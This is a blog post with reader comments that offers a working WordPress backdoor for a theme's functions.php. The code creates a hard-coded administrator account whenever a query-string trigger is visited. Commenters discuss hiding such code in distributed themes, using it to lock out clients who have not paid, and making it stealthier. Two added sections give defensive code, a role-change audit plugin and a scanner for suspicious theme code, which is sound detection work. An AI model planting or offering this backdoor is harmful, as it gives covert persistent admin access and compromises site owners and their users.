Have you ever wanted an easy backdoor that auto-creates an administrator account in WordPress? The code snippet below does just that! Simply place the code in your theme's functions.php file and upload it to your web server:
<?php
// wp_head fires inside the theme's <head> on every front-end page load,
// so this check runs for every visitor.
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    // isset() guard avoids an "undefined index" notice on every page load
    if (isset($_GET['backdoor']) && $_GET['backdoor'] === 'go') {
        // wp_create_user() lived in wp-includes/registration.php in WordPress 2.x;
        // load it relative to ABSPATH rather than the current working directory.
        // Newer versions already have wp_create_user() loaded, so skip if absent.
        if (file_exists(ABSPATH . WPINC . '/registration.php')) {
            require_once ABSPATH . WPINC . '/registration.php';
        }
        if (!username_exists('brad')) {
            $user_id = wp_create_user('brad', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>
To activate this code, simply visit http://example.com?backdoor=go
When triggered, the code creates a new administrator account with the username brad and the password pa55w0rd. The function first checks that the user account doesn't already exist before creating it.
Keep in mind that using this code is a security risk: anyone who knows the query string can trigger the function. Also, don't be evil; only use this code for good!
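The snippet above creates its account through WP_User::set_role(), which fires the set_user_role action. That gives a site owner a reliable place to notice an unexpected administrator appearing. The following is an added example, not code from the post or its comments: a must-use plugin that logs and emails every role change that grants administrator, plus a WP-CLI report of current administrators. Function names prefixed ara_ and the command name admin-audit are my own choices; everything else is standard WordPress and WP-CLI API.

```php
<?php
/*
 * Plugin Name: Admin Role Audit (constructed example)
 * Place this file in wp-content/mu-plugins/ so it loads before any theme or plugin.
 */

// Fires from WP_User::set_role(), the same call the backdoor snippet uses.
// Log every role change; additionally email the site owner when the new role is administrator.
add_action('set_user_role', 'ara_log_role_change', 10, 3);
function ara_log_role_change($user_id, $role, $old_roles) {
    $user  = get_userdata($user_id);
    $login = $user ? $user->user_login : 'id:' . $user_id;
    $msg   = sprintf(
        '[admin-role-audit] user %s role set to "%s" (was: %s) via %s %s',
        $login,
        $role,
        $old_roles ? implode(',', $old_roles) : 'none',
        isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : 'cli',
        isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''
    );
    error_log($msg); // goes to the PHP error log, or wp-content/debug.log with WP_DEBUG_LOG
    if ($role === 'administrator') {
        wp_mail(get_option('admin_email'), 'New administrator account on ' . home_url(), $msg);
    }
}

// Return every current administrator with registration date, so the owner can
// spot an account they never created (for example one made by a theme hook).
function ara_list_administrators() {
    $rows = array();
    foreach (get_users(array('role' => 'administrator')) as $u) {
        $rows[] = array(
            'login'      => $u->user_login,
            'email'      => $u->user_email,
            'registered' => $u->user_registered,
        );
    }
    return $rows;
}

// Usage from the shell: wp admin-audit list
if (defined('WP_CLI') && WP_CLI) {
    WP_CLI::add_command('admin-audit list', function () {
        WP_CLI\Utils\format_items('table', ara_list_administrators(), array('login', 'email', 'registered'));
    });
}
```

Because the page's snippet sets the role through set_role() after wp_create_user(), the log line records the request URI that triggered it, which in this case contains the backdoor=go query string. A scheduled run of the WP-CLI report (for example from cron) catches accounts added by any other path as well.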
What you’re presenting here is way not fair.
Not fair in what way Daniel?
Obviously, because someone may use it to hack into other people’s blogs.
To set this code up you would need FTP access to a site. So technically you can't really hack a site with this code, but I see where you are coming from. That's why I said don't be evil.
@Daniel: If someone has enough access to a blog to be able to implement this code, then this should be the least of your worries.
Brad (or anyone), can you give a practical example of how setting up a backdoor like this could be used legitimately? To be honest, I can’t think of anything good coming out of it.
It’s interesting.
I'm not a WP expert, but if a WordPress theme creator (such as leland) inserted this code into a theme's functions.php file… couldn't he gain access to any blog using the user/pass defined in that code?
Just wondering, as I said, I'm not a WP expert.
Keith,
Yeah – they could.
I’m using similar code via a plugin for clients. The plugin sits in the admin sidebar and acts, mostly, as a contact form. It sits there in case a client needs help with something. When they do, they click on the link in the sidebar and fill in the form to “call” us.
If there isn’t already a dedicated user for us, a button is also on that page with a reminder that it’s best to have us work under our own username, and that they can click the button to generate one for us.
Prejudices, Brad? :)
As stated above, it may be very easy for theme creators to insert such code into themes. It can also be encoded and inserted somewhere randomly as just a line of text. Most users are illiterates so chances are they won’t even suspect it.
@Leland: You have FTP access to a client’s blog but are unable to access their administration area (forgotten password and unknown e-mail address) or MySQL. The times you’d need this are rather slim though.
Regardless, it’s not like Brad just invented something new here. This is one of the least detrimental things one could do to your blog if they wanted to. A theme is like a plugin — I could use a theme to spam other blogs, give me access to the files on your server, etc. etc. etc.
@Viper007Bond: Yeah, true. Thanks for the response. I guess it can come in handy for when you just have FTP access and no other way to login.
Also thanks Tommy for the response, that sounds like an interesting application as well.
Nice to see this code snippet got some conversations going! There are definitely many different uses for this code, some good and some bad. Any theme or plugin could contain malicious code, so it’s always a good idea to review the code of any theme or plugin you plan on using if it’s not from a trusted source.
I can see the good and the bad in this. Let’s say you are creating a design for a client, one you know will need support in the future. By adding this to your functions, you will always be able to have a login to access the account, even if they delete yours and forget how to add a new one.
The one note here is that it is the intention of the programmer that really matters. Sure you can add this as a backdoor hack to manipulate WordPress blogs. And let's face it, those with bad intentions most likely already know how to do this.
So for those of you arguing that this is bad, at least the average user can see how it is implemented and can look at the functions of a theme they are thinking of using for any suspicious code.
And for those claiming that you can encode this, that is yet another warning for the average user. If you look in the functions.php file and see a set of random characters, beware. This is encoded data that may do a number of things. I have seen code like this automatically add “spammy” links, and more. And yes, some of the themes with this sort of code are actually found at WordPress.org! (or at least were last time I looked)
Bottom line, if you use this code in your theme, you should disclose to the end user why it is there so they can decide for themselves. If as a user, you aren’t sure about a theme, don’t use it. If you see a random line of characters, know that something is encoded and beware.
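The advice in this thread to read a theme's functions.php before using it, and to be wary of long runs of random characters, can be turned into a quick check. Below is an added example written for this page, not code from the post or any commenter: a heuristic scanner that walks PHP files and flags the constructs discussed here (user creation, granting the administrator role, reading request parameters in a hook, eval(), common decoders, and long opaque strings). The embedded sample input is constructed from the post's snippet plus a placeholder encoded line; the function names are my own. Hits are indicators to review by hand, not proof of malice.

```php
<?php
// Heuristic scanner for theme/plugin PHP files (constructed example).
// Usage: php scan.php [path-to-theme-or-plugin-dir]
// Without an argument it scans the embedded sample below.

$patterns = array(
    'creates a user'                               => '/\bwp_create_user\s*\(/',
    'grants administrator role'                    => '/->set_role\s*\(\s*[\'"]administrator[\'"]/',
    'reads request parameters'                     => '/\$_(GET|POST|REQUEST|COOKIE)\s*\[/',
    'eval() of dynamic code'                       => '/\beval\s*\(/',
    'decoder commonly used to hide code'           => '/\b(base64_decode|gzinflate|gzuncompress|str_rot13|convert_uudecode)\s*\(/',
    'long opaque string (possible encoded payload)' => '/[A-Za-z0-9+\/=]{120,}/',
);

// Scan one PHP source string; return one hit per (line, pattern) match.
function scan_php_source($source, $patterns) {
    $hits = array();
    foreach (explode("\n", $source) as $n => $line) {
        foreach ($patterns as $label => $re) {
            if (preg_match($re, $line)) {
                $hits[] = array('line' => $n + 1, 'reason' => $label, 'text' => trim($line));
            }
        }
    }
    return $hits;
}

// Scan every .php file below $dir; return hits keyed by file path.
function scan_directory($dir, $patterns) {
    $report = array();
    $it = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));
    foreach ($it as $file) {
        if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
            $hits = scan_php_source(file_get_contents($file->getPathname()), $patterns);
            if ($hits) {
                $report[$file->getPathname()] = $hits;
            }
        }
    }
    return $report;
}

// Constructed sample: the post's snippet plus an eval'd blob of the kind described
// in the comments. The base64 payload is a placeholder ("AAA" repeated), not real code.
$sample = <<<'PHP'
<?php
add_action('wp_head', 'my_backdoor');
function my_backdoor() {
    if ($_GET['backdoor'] == 'go') {
        if (!username_exists('brad')) {
            $user_id = wp_create_user('brad', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
PHP;
$sample .= "\neval(base64_decode('" . str_repeat('QUFB', 50) . "'));\n";

$report = isset($argv[1])
    ? scan_directory($argv[1], $patterns)
    : array('(embedded sample)' => scan_php_source($sample, $patterns));

foreach ($report as $path => $hits) {
    echo "== $path ==\n";
    foreach ($hits as $h) {
        printf("  line %3d  %-45s %s\n", $h['line'], $h['reason'], $h['text']);
    }
}
if (!$report) {
    echo "No indicators found.\n";
}
```

On the embedded sample the scanner reports the $_GET read, the wp_create_user() call, the set_role('administrator') call, and the eval/base64_decode line twice (once as a decoder, once as a long opaque string). A legitimate theme can trip individual patterns (a membership plugin legitimately calls wp_create_user), so the value is in combinations: request-parameter reads next to role grants inside a front-end hook are what the post's snippet looks like.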
Hmm, tbh I'm using this code with clients that have not paid for work I have done, to protect it in case they refuse to pay and change passwords. I can easily log in and disable the blog until they pay.
A change I would encourage to this code… to prevent any hacker in the world from using this as a backdoor, instead of adding your password in the code, have WordPress create a password for you. Sure, you won’t know what it is, but if you are the only one with access to the email in the code, then you can use the password reset option in WordPress to gain access. This just makes the backdoor more secure for the client, but still accessible for the support.